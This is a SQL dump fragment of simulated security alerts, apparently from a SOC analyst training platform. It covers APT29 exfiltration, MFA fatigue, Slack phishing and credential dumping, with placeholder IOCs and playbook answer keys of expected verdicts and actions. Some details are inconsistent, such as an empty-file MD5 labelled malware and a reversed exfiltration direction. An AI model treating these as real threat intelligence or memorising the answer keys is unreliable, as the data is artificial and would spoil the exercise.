Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(884, 'Data Exfiltration Attempt Identified', 'high', 'Data Loss Prevention (DLP)', 'APT29 attempts to exfiltrate critical data from compromised systems, targeting government and defense sector intelligence.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:05Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"b2f5ff47436671b6e533d8dc3614845d\",\"user\":\"jdoe\",\"exfiltration_method\":\"HTTP POST\",\"action\":\"blocked\",\"alert_id\":\"DLP-20231015-1025\",\"additional_info\":{\"url\":\"http://maliciousdomain.com/upload\",\"protocol\":\"HTTP\",\"bytes_transferred\":10485760}}', '2026-01-15 00:56:34', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known APT29 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised host within the organization.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP System\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document containing classified information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b2f5ff47436671b6e533d8dc3614845d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with data exfiltration attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"Malware distribution and data 
exfiltration site used by APT29.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee account used for unauthorized data access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.556Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"b2f5ff47436671b6e533d8dc3614845d\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_method\\\":\\\"HTTP POST\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231015-1025\\\",\\\"additional_info\\\":{\\\"url\\\":\\\"http://maliciousdomain.com/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"bytes_transferred\\\":10485760}}\"},{\"timestamp\":\"2026-02-01T20:31:22.556Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"b2f5ff47436671b6e533d8dc3614845d\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_method\\\":\\\"HTTP 
POST\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231015-1025\\\",\\\"additional_info\\\":{\\\"url\\\":\\\"http://maliciousdomain.com/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"bytes_transferred\\\":10485760}}\"},{\"timestamp\":\"2026-02-01T20:30:22.556Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"b2f5ff47436671b6e533d8dc3614845d\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_method\\\":\\\"HTTP POST\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231015-1025\\\",\\\"additional_info\\\":{\\\"url\\\":\\\"http://maliciousdomain.com/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"bytes_transferred\\\":10485760}}\"},{\"timestamp\":\"2026-02-01T20:29:22.556Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"b2f5ff47436671b6e533d8dc3614845d\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_method\\\":\\\"HTTP POST\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231015-1025\\\",\\\"additional_info\\\":{\\\"url\\\":\\\"http://maliciousdomain.com/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"bytes_transferred\\\":10485760}}\"},{\"timestamp\":\"2026-02-01T20:28:22.556Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:05Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.102\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"b2f5ff47436671b6e533d8dc3614845d\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_method\\\":\\\"HTTP POST\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231015-1025\\\",\\\"additional_info\\\":{\\\"url\\\":\\\"http://maliciousdomain.com/upload\\\",\\\"protocol\\\":\\\"HTTP\\\",\\\"bytes_transferred\\\":10485760}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(885, 'Initial Access via MFA Fatigue Attack', 'high', 'MFA logs', 'Lapsus$ initiates the attack by bombarding a contractor\'s MFA with repeated requests, causing fatigue and eventual approval. This technique is aimed at bypassing multi-factor authentication through repeated attempts, leading the target to inadvertently approve access.', 'Credential Access', 'T1110.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:11Z\",\"event_type\":\"MFA Request\",\"user\":\"j.doe@contractor.com\",\"user_role\":\"Contractor\",\"source_ip\":\"45.67.89.101\",\"destination_ip\":\"10.0.5.12\",\"mfa_method\":\"push_notification\",\"request_count\":50,\"final_action\":\"approved\",\"device\":{\"device_id\":\"device123\",\"os\":\"iOS\",\"os_version\":\"14.8\"},\"user_agent\":\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\"}', '2026-01-15 00:57:25', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.67.89.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lapsus$ operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate VPN gateway.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe@contractor.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"clean\",\"details\":\"Current contractor with valid credentials.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.557Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:11Z\\\",\\\"event_type\\\":\\\"MFA Request\\\",\\\"user\\\":\\\"j.doe@contractor.com\\\",\\\"user_role\\\":\\\"Contractor\\\",\\\"source_ip\\\":\\\"45.67.89.101\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"mfa_method\\\":\\\"push_notification\\\",\\\"request_count\\\":50,\\\"final_action\\\":\\\"approved\\\",\\\"device\\\":{\\\"device_id\\\":\\\"device123\\\",\\\"os\\\":\\\"iOS\\\",\\\"os_version\\\":\\\"14.8\\\"},\\\"user_agent\\\":\\\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.557Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:11Z\\\",\\\"event_type\\\":\\\"MFA Request\\\",\\\"user\\\":\\\"j.doe@contractor.com\\\",\\\"user_role\\\":\\\"Contractor\\\",\\\"source_ip\\\":\\\"45.67.89.101\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"mfa_method\\\":\\\"push_notification\\\",\\\"request_count\\\":50,\\\"final_action\\\":\\\"approved\\\",\\\"device\\\":{\\\"device_id\\\":\\\"device123\\\",\\\"os\\\":\\\"iOS\\\",\\\"os_version\\\":\\\"14.8\\\"},\\\"user_agent\\\":\\\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.557Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:11Z\\\",\\\"event_type\\\":\\\"MFA 
Request\\\",\\\"user\\\":\\\"j.doe@contractor.com\\\",\\\"user_role\\\":\\\"Contractor\\\",\\\"source_ip\\\":\\\"45.67.89.101\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"mfa_method\\\":\\\"push_notification\\\",\\\"request_count\\\":50,\\\"final_action\\\":\\\"approved\\\",\\\"device\\\":{\\\"device_id\\\":\\\"device123\\\",\\\"os\\\":\\\"iOS\\\",\\\"os_version\\\":\\\"14.8\\\"},\\\"user_agent\\\":\\\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.557Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:11Z\\\",\\\"event_type\\\":\\\"MFA Request\\\",\\\"user\\\":\\\"j.doe@contractor.com\\\",\\\"user_role\\\":\\\"Contractor\\\",\\\"source_ip\\\":\\\"45.67.89.101\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"mfa_method\\\":\\\"push_notification\\\",\\\"request_count\\\":50,\\\"final_action\\\":\\\"approved\\\",\\\"device\\\":{\\\"device_id\\\":\\\"device123\\\",\\\"os\\\":\\\"iOS\\\",\\\"os_version\\\":\\\"14.8\\\"},\\\"user_agent\\\":\\\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.557Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:11Z\\\",\\\"event_type\\\":\\\"MFA 
Request\\\",\\\"user\\\":\\\"j.doe@contractor.com\\\",\\\"user_role\\\":\\\"Contractor\\\",\\\"source_ip\\\":\\\"45.67.89.101\\\",\\\"destination_ip\\\":\\\"10.0.5.12\\\",\\\"mfa_method\\\":\\\"push_notification\\\",\\\"request_count\\\":50,\\\"final_action\\\":\\\"approved\\\",\\\"device\\\":{\\\"device_id\\\":\\\"device123\\\",\\\"os\\\":\\\"iOS\\\",\\\"os_version\\\":\\\"14.8\\\"},\\\"user_agent\\\":\\\"Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(886, 'Execution of Phishing Campaign on Slack', 'high', 'Slack chat logs', 'An advanced phishing campaign was detected on Slack, where attackers used social engineering to send deceptive messages. The goal was to trick employees into divulging sensitive information. An external IP was involved in sending a malicious file, which was shared in a Slack channel.', 'Phishing', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"203.0.113.5\",\"internal_ip\":\"10.1.12.34\",\"user\":\"j.doe@company.com\",\"channel\":\"#general\",\"message\":\"Please review the attached document for the latest update.\",\"attachment\":{\"filename\":\"Q3_finance_report.pdf\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://malicious-site.com/download/Q3_finance_report.pdf\"},\"action_taken\":\"None\"}', '2026-01-15 00:57:25', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware by multiple security vendors.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/download/Q3_finance_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Scanner\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing activities.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user within the 
organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.559Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"10.1.12.34\\\",\\\"user\\\":\\\"j.doe@company.com\\\",\\\"channel\\\":\\\"#general\\\",\\\"message\\\":\\\"Please review the attached document for the latest update.\\\",\\\"attachment\\\":{\\\"filename\\\":\\\"Q3_finance_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://malicious-site.com/download/Q3_finance_report.pdf\\\"},\\\"action_taken\\\":\\\"None\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.559Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"10.1.12.34\\\",\\\"user\\\":\\\"j.doe@company.com\\\",\\\"channel\\\":\\\"#general\\\",\\\"message\\\":\\\"Please review the attached document for the latest update.\\\",\\\"attachment\\\":{\\\"filename\\\":\\\"Q3_finance_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://malicious-site.com/download/Q3_finance_report.pdf\\\"},\\\"action_taken\\\":\\\"None\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.559Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"10.1.12.34\\\",\\\"user\\\":\\\"j.doe@company.com\\\",\\\"channel\\\":\\\"#general\\\",\\\"message\\\":\\\"Please review the attached document for the latest update.\\\",\\\"attachment\\\":{\\\"filename\\\":\\\"Q3_finance_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://malicious-site.com/download/Q3_finance_report.pdf\\\"},\\\"action_taken\\\":\\\"None\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.559Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"10.1.12.34\\\",\\\"user\\\":\\\"j.doe@company.com\\\",\\\"channel\\\":\\\"#general\\\",\\\"message\\\":\\\"Please review the attached document for the latest update.\\\",\\\"attachment\\\":{\\\"filename\\\":\\\"Q3_finance_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://malicious-site.com/download/Q3_finance_report.pdf\\\"},\\\"action_taken\\\":\\\"None\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.559Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.5\\\",\\\"internal_ip\\\":\\\"10.1.12.34\\\",\\\"user\\\":\\\"j.doe@company.com\\\",\\\"channel\\\":\\\"#general\\\",\\\"message\\\":\\\"Please review the attached document for the latest 
update.\\\",\\\"attachment\\\":{\\\"filename\\\":\\\"Q3_finance_report.pdf\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://malicious-site.com/download/Q3_finance_report.pdf\\\"},\\\"action_taken\\\":\\\"None\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(887, 'Persistence through Compromised Credentials', 'high', 'Credential storage systems', 'An attacker accessed Slack and retrieved exposed credentials, utilizing them to maintain persistent access within the network. The retrieved credentials were then used to access several internal systems.', 'Credential Dumping', 'T1003.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"credential_access\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.5\",\"user\":\"compromised_user\",\"retrieved_credentials\":[{\"type\":\"password\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"},{\"type\":\"token\",\"value\":\"xoxb-2398473284-2398478234-2398478234\"}],\"accessed_systems\":[\"192.168.1.10\",\"192.168.1.11\"],\"filename\":\"cred_dump.log\",\"event_id\":\"evt-2023-10-12-001\"}', '2026-01-15 00:57:25', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous credential dumping activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host used as a pivot point.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Password Hash Database\",\"verdict\":\"malicious\",\"details\":\"Known password hash for \'password\'.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"cred_dump.log\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Log 
Files\",\"verdict\":\"clean\",\"details\":\"Log file generated during credential access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.561Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"credential_access\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.5\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"retrieved_credentials\\\":[{\\\"type\\\":\\\"password\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"},{\\\"type\\\":\\\"token\\\",\\\"value\\\":\\\"xoxb-2398473284-2398478234-2398478234\\\"}],\\\"accessed_systems\\\":[\\\"192.168.1.10\\\",\\\"192.168.1.11\\\"],\\\"filename\\\":\\\"cred_dump.log\\\",\\\"event_id\\\":\\\"evt-2023-10-12-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.561Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"credential_access\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.5\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"retrieved_credentials\\\":[{\\\"type\\\":\\\"password\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"},{\\\"type\\\":\\\"token\\\",\\\"value\\\":\\\"xoxb-2398473284-2398478234-2398478234\\\"}],\\\"accessed_systems\\\":[\\\"192.168.1.10\\\",\\\"192.168.1.11\\\"],\\\"filename\\\":\\\"cred_dump.log\\\",\\\"event_id\\\":\\\"evt-2023-10-12-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.561Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"credential_access\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.5\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"retrieved_credentials\\\":[{\\\"type\\\":\\\"password\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"},{\\\"type\\\":\\\"token\\\",\\\"value\\\":\\\"xoxb-2398473284-2398478234-2398478234\\\"}],\\\"accessed_systems\\\":[\\\"192.168.1.10\\\",\\\"192.168.1.11\\\"],\\\"filename\\\":\\\"cred_dump.log\\\",\\\"event_id\\\":\\\"evt-2023-10-12-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.561Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"credential_access\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.5\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"retrieved_credentials\\\":[{\\\"type\\\":\\\"password\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"},{\\\"type\\\":\\\"token\\\",\\\"value\\\":\\\"xoxb-2398473284-2398478234-2398478234\\\"}],\\\"accessed_systems\\\":[\\\"192.168.1.10\\\",\\\"192.168.1.11\\\"],\\\"filename\\\":\\\"cred_dump.log\\\",\\\"event_id\\\":\\\"evt-2023-10-12-001\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.561Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"credential_access\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.5\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"retrieved_credentials\\\":[{\\\"type\\\":\\\"password\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"},{\\\"type\\\":\\\"token\\\",\\\"value\\\":\\\"xoxb-2398473284-2398478234-2398478234\\\"}],\\\"accessed_systems\\\":[\\\"192.168.1.10\\\",\\\"192.168.1.11\\\"],\\\"filename\\\":\\\"cred_dump.log\\\",\\\"event_id\\\":\\\"evt-2023-10-12-001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
